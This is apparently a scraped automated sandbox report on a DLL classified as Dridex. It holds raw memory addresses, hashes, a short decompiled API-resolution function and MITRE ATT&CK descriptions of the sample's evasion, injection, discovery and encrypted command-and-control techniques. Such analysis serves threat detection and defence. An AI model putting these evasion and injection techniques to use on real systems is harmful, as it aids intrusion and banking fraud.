0x6f4c14de
0x6f4c14e4
0x6f4c14e7
0x6f4c14ee
0x6f4c14f2
0x6f4c14f9
0x6f4c1502
0x6f4c1506
0x6f4c150a
0x6f4c1510
0x00000000
0x00000000
0x00000000
0x6f4c1510
0x6f4c16b6
0x6f4c16c2
0x6f4c16cd
0x6f4c16d4
0x6f4c16dd
0x6f4c16e7
0x6f4c16e8
0x6f4c16f6
0x6f4c16fb
0x6f4c16fc
0x6f4c1709
0x6f4c170e
0x6f4c1720
0x6f4c1725
0x6f4c172a
0x6f4c173c
0x6f4c174e
0x6f4c1753
0x6f4c175e
0x6f4c1765
0x6f4c176a
0x6f4c1772
0x6f4c177b
0x6f4c177b
0x6f4c1787
0x6f4c178e
0x6f4c179a
0x6f4c17a6
0x6f4c17b4
0x6f4c17c5
0x6f4c17cc
0x6f4c17d1
0x6f4c17da
0x6f4c17df
0x6f4c17e1
0x6f4c17e5
0x6f4c17e9
0x6f4c17f6
0x6f4c1803
0x6f4c1807
0x6f4c181b
0x6f4c181f
0x00000000
0x00000000
0x6f4c1834
0x6f4c1836
0x6f4c183e
0x6f4c183b
0x6f4c183b
0x6f4c183b
0x6f4c1842
0x6f4c1844
0x6f4c184a
0x6f4c1850
0x6f4c18ac
0x6f4c18b5
0x6f4c18b9
0x6f4c18c6
0x6f4c18cf
0x6f4c18d4
0x6f4c18d8
0x6f4c18db
0x6f4c193c
0x6f4c1952
0x6f4c195d
0x6f4c195e
0x6f4c195f
0x6f4c1963
0x6f4c1966
0x6f4c1be6
0x6f4c1be9
0x6f4c1be9
0x00000000
0x6f4c1966
0x6f4c18e5
0x6f4c18f5
0x6f4c18fe
0x6f4c1907
0x6f4c1910
0x6f4c1911
0x6f4c1912
0x6f4c1917
0x6f4c191f
0x6f4c1927
0x00000000
0x00000000
0x00000000
0x6f4c1929
0x6f4c1859
0x6f4c185e
0x6f4c1862
0x6f4c1862
0x6f4c1866
0x6f4c1869
0x00000000
0x00000000
0x6f4c188a
0x6f4c188c
0x6f4c1890
0x6f4c1892
0x00000000
0x00000000
0x6f4c1894
0x6f4c189b
0x6f4c18a7
0x00000000
0x6f4c18a7
0x6f4c186e
0x00000000
0x6f4c196c
0x6f4c196c
0x6f4c196d
0x6f4c197d
0x6f4c1989
0x6f4c1992
0x6f4c199b
0x6f4c19a4
0x00000000
0x6f4c19a4
0x6f4c1653
0x6f4c1655
0x6f4c1657
0x6f4c165c
0x6f4c1661
0x6f4c1674
0x6f4c168a
0x6f4c1693
0x6f4c1694
0x6f4c1694
0x6f4c1696
0x6f4c1697
0x6f4c169a
0x6f4c169e
0x00000000
0x6f4c1657
0x6f4c15f3
0x6f4c15fd
0x6f4c15fe
0x6f4c15fe
0x6f4c160b
0x6f4c1617
0x6f4c1619
0x6f4c161b
0x6f4c161f
0x6f4c162f
0x6f4c162f
0x6f4c1636
0x6f4c1639
0x6f4c163a
0x6f4c163e
0x6f4c1648
0x00000000
0x6f4c1648

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ffc937af7bc17aac27b7fd7bccf8fd288a85f15da72f3232cc2e5945519e27
Instruction ID: fc9292909274b551fa50f3bb1af8d44dae0be13d385541c63c945defe982a21f
Opcode Fuzzy Hash: d6ffc937af7bc17aac27b7fd7bccf8fd288a85f15da72f3232cc2e5945519e27
Instruction Fuzzy Hash: 8F329D381083448FD714DF64C890EABBBE1FFD4314F10992DE5998B6A2EB70E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F4B6D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F4B6D0C() {

				 *0x6f4cd280 = GetUserNameW;
				 *0x6F4CD284 = MessageBoxW;
				 *0x6F4CD288 = GetLastError;
				 *0x6F4CD28C = CreateFileA;
				 *0x6F4CD290 = DebugBreak;
				 *0x6F4CD294 = FlushFileBuffers;
				 *0x6F4CD298 = FreeEnvironmentStringsA;
				 *0x6F4CD29C = GetConsoleOutputCP;
				 *0x6F4CD2A0 = GetEnvironmentStrings;
				 *0x6F4CD2A4 = GetLocaleInfoA;
				 *0x6F4CD2A8 = GetStartupInfoA;
				 *0x6F4CD2AC = GetStringTypeA;
				 *0x6F4CD2B0 = HeapValidate;
				 *0x6F4CD2B4 = IsBadReadPtr;
				 *0x6F4CD2B8 = LCMapStringA;
				 *0x6F4CD2BC = LoadLibraryA;
				 *0x6F4CD2C0 = OutputDebugStringA;
				return 0x6f4cd280;
			}

0x6f4b6d1d
0x6f4b6d25
0x6f4b6d28
0x6f4b6d37
0x6f4b6d3a
0x6f4b6d49
0x6f4b6d4c
0x6f4b6d5b
0x6f4b6d5e
0x6f4b6d6d
0x6f4b6d70
0x6f4b6d7f
0x6f4b6d82
0x6f4b6d91
0x6f4b6d94
0x6f4b6da3
0x6f4b6da6
0x6f4b6da9

Memory Dump Source

Source File: 00000000.00000002.749937166.000000006F4B1000.00000020.00020000.sdmp, Offset: 6F4B0000, based on PE: true

Associated: 00000000.00000002.749920504.000000006F4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749980349.000000006F4CA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.749998070.000000006F4CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.750012504.000000006F4CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3f7ccae2054d8f65f7b49c4598fc8a14858e86cab365fce2fd08d12af3025a
Instruction ID: 4f33b1afe4f7195929f5046f011662853997a77a694ce87aa8c01378fe3bc5c5
Opcode Fuzzy Hash: 4b3f7ccae2054d8f65f7b49c4598fc8a14858e86cab365fce2fd08d12af3025a
Instruction Fuzzy Hash: A51113B8905A01CF8748DF06D1A48517FF1BF8D3A4312A2EAD9098BB65D734D855CF54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Pv3ZsGsdfS.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Dridex

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

Function 6F4C0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Function 6F4C2234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Function 6F4C2820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Function 6F4C3138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 0103141B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 173
memoryCOMMON

Function 6F4C5E84, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Function 6F4C10A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Function 6F4C57B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Function 6F4C5B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Function 01031D4F, Relevance: 1.6, APIs: 1, Instructions: 70
COMMON

Function 6F4C1166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 6F4C5BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F4C5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Function 6F4C5BD1, Relevance: 1.6, APIs: 1, Instructions: 64
fileCOMMON

Function 6F4C5BB3, Relevance: 1.6, APIs: 1, Instructions: 60
fileCOMMON

Function 6F4C5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Function 6F4C5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Function 6F4C564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Function 6F4C1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Function 6F4C3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Function 6F4B1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Function 6F4BA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Function 6F4B8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Function 6F4C9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Function 6F4C143C, Relevance: .6, Instructions: 572
COMMONCrypto

Function 6F4B6D0C, Relevance: .0, Instructions: 36
COMMON